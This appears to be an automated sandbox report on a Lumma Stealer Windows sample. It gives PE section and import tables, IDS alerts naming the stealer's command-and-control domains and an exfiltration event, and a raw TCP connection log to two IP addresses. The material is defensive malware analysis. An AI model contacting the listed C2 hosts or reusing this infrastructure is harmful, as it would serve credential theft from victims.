                                                                                                                                                                                                                        .data0xb70000x37a40x3800cab2107c933b696aa5cf0cc6c3fd3980False0.36097935267857145data5.048648594372454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .bss0xbb0000x6de80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .idata0xc20000xfdc0x1000e7d1635e2624b124cfdce6c360ac21cdFalse0.3798828125data5.029087481102678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .didata0xc30000x1a40x2008ced971d8a7705c98b173e255d8c9aa7False0.345703125data2.7509822285969876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .edata0xc40000x9a0x2008d4e1e508031afe235bf121c80fd7d5fFalse0.2578125data1.877162954504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .tls0xc50000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rdata0xc60000x5d0x2008f2f090acd9622c88a6a852e72f94e96False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0xc70000x5da000x5da004fc770675f55441ae49e1dec36d57128False0.6438219709612817data7.440040750203299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_ICON0xc75580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.43949893390191896
                                                                                                                                                                                                                        RT_ICON0xc84000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.45306859205776173
                                                                                                                                                                                                                        RT_ICON0xc8ca80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5505780346820809
                                                                                                                                                                                                                        RT_ICON0xc92100xca8Device independent bitmap graphic, 32 x 64 x 24, image size 0EnglishUnited States0.14876543209876544
                                                                                                                                                                                                                        RT_ICON0xc9eb80x368Device independent bitmap graphic, 16 x 32 x 24, image size 0EnglishUnited States0.22477064220183487
                                                                                                                                                                                                                        RT_ICON0xca2200x1734PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9705387205387206
                                                                                                                                                                                                                        RT_ICON0xcb9540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.18651452282157677
                                                                                                                                                                                                                        RT_STRING0xcdefc0x360data0.34375
                                                                                                                                                                                                                        RT_STRING0xce25c0x260data0.3256578947368421
                                                                                                                                                                                                                        RT_STRING0xce4bc0x45cdata0.4068100358422939
                                                                                                                                                                                                                        RT_STRING0xce9180x40cdata0.3754826254826255
                                                                                                                                                                                                                        RT_STRING0xced240x2d4data0.39226519337016574
                                                                                                                                                                                                                        RT_STRING0xceff80xb8data0.6467391304347826
                                                                                                                                                                                                                        RT_STRING0xcf0b00x9cdata0.6410256410256411
                                                                                                                                                                                                                        RT_STRING0xcf14c0x374data0.4230769230769231
                                                                                                                                                                                                                        RT_STRING0xcf4c00x398data0.3358695652173913
                                                                                                                                                                                                                        RT_STRING0xcf8580x368data0.3795871559633027
                                                                                                                                                                                                                        RT_STRING0xcfbc00x2a4data0.4275147928994083
                                                                                                                                                                                                                        RT_RCDATA0xcfe640x10data1.5
                                                                                                                                                                                                                        RT_RCDATA0xcfe740x2c4data0.6384180790960452
                                                                                                                                                                                                                        RT_RCDATA0xd01380x2cdata1.2045454545454546
                                                                                                                                                                                                                        RT_GROUP_ICON0xd01640x68dataEnglishUnited States0.7211538461538461
                                                                                                                                                                                                                        RT_VERSION0xd01cc0x584dataEnglishUnited States0.29036827195467424
                                                                                                                                                                                                                        RT_MANIFEST0xd07500x7a8XML 1.0 document, ASCII text, with very long lines (391), with CRLF line terminatorsEnglishUnited States0.3464285714285714
                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                                                                                                                        comctl32.dllInitCommonControls
                                                                                                                                                                                                                        version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                                                                                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                                                                                                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                                                                                                                        netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                                                                                                                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                                        TMethodImplementationIntercept30x4541a8
                                                                                                                                                                                                                        __dbk_fcall_wrapper20x40d0a0
                                                                                                                                                                                                                        dbkFCallWrapperAddr10x4be63c
                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                        2025-01-10T11:36:19.519203+01002058039ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)1192.168.2.12563501.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.532991+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.12645901.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.543790+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.12562651.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.558399+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.12542811.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.573166+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.12531221.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.584352+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.12563781.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.596381+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.12494191.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.610905+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.12524791.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:19.624899+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.12507471.1.1.153UDP
                                                                                                                                                                                                                        2025-01-10T11:36:20.299112+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249715104.102.49.254443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:20.782904+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1249715104.102.49.254443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:21.414391+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249716104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:21.874704+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1249716104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:21.874704+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249716104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:22.439288+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249717104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:22.914361+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1249717104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:22.914361+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249717104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:23.858172+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249719104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:25.272889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249722104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:26.645648+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249724104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:28.057227+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249725104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:28.492586+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1249725104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:29.027636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249727104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:30.372212+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1249728104.21.64.1443TCP
                                                                                                                                                                                                                        2025-01-10T11:36:30.829987+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1249728104.21.64.1443TCP
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.654933929 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.654961109 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.655112028 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.659447908 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:19.659476995 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.299000978 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.299112082 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.302761078 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.302787066 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.303092003 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.365618944 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.411341906 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.782936096 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.782962084 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.782969952 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.783006907 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.783027887 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.783091068 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.783107996 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.783152103 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.783198118 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.877121925 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.877161026 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.877458096 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.877480984 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.877589941 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.882302046 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.882478952 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.886744976 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.886831999 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.886918068 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.887718916 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.887718916 CET49715443192.168.2.12104.102.49.254
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.887737989 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.887742996 CET44349715104.102.49.254192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.941991091 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.942040920 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.942140102 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.942652941 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:20.942665100 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.414235115 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.414391041 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.416764975 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.416779041 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.417045116 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.418411970 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.418427944 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.418483973 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.874720097 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.874824047 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.874881029 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.875386000 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.875386000 CET49716443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.875416994 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.875432968 CET44349716104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.961131096 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.961162090 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.961316109 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.962759972 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:21.962770939 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.439193964 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.439287901 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.440700054 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.440717936 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.441024065 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.442212105 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.442213058 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.442326069 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914361954 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914417982 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914449930 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914479017 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914483070 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914495945 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.914961100 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.915380001 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.915415049 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.915437937 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.915446997 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.915836096 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.915843010 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.919090986 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.919123888 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.919250011 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.919264078 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:22.919337988 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005317926 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005388021 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005470037 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005490065 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005562067 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005738020 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005759954 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005774975 CET49717443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.005786896 CET44349717104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.309303045 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.309341908 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.309426069 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.309778929 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.309789896 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.858093977 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.858171940 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.860057116 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.860064030 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.860368013 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.861684084 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.861818075 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:23.861841917 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.454958916 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.455049038 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.455338955 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.455665112 CET49719443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.455682039 CET44349719104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.804461956 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.804508924 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.804651022 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.805083990 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:24.805097103 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.272804976 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.272888899 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.274235964 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.274249077 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.274547100 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.283934116 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.284152031 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.284172058 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.284221888 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.331331968 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.789886951 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.789988995 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.790049076 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.790234089 CET49722443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:25.790252924 CET44349722104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.115585089 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.115638971 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.115712881 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.116137981 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.116151094 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.645570993 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.645648003 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.647562027 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.647576094 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.647854090 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.657195091 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.657361984 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.657397032 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.657512903 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:26.657524109 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.266872883 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.266963959 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.267072916 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.267327070 CET49724443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.267350912 CET44349724104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.600182056 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.600239038 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.600378036 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.600706100 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:27.600724936 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.057106018 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.057226896 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.058609962 CET49725443192.168.2.12104.21.64.1
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.058626890 CET44349725104.21.64.1192.168.2.12
                                                                                                                                                                                                                        Jan 10, 2025 11:36:28.058960915 CET44349725104.21.64.1192.168.2.12
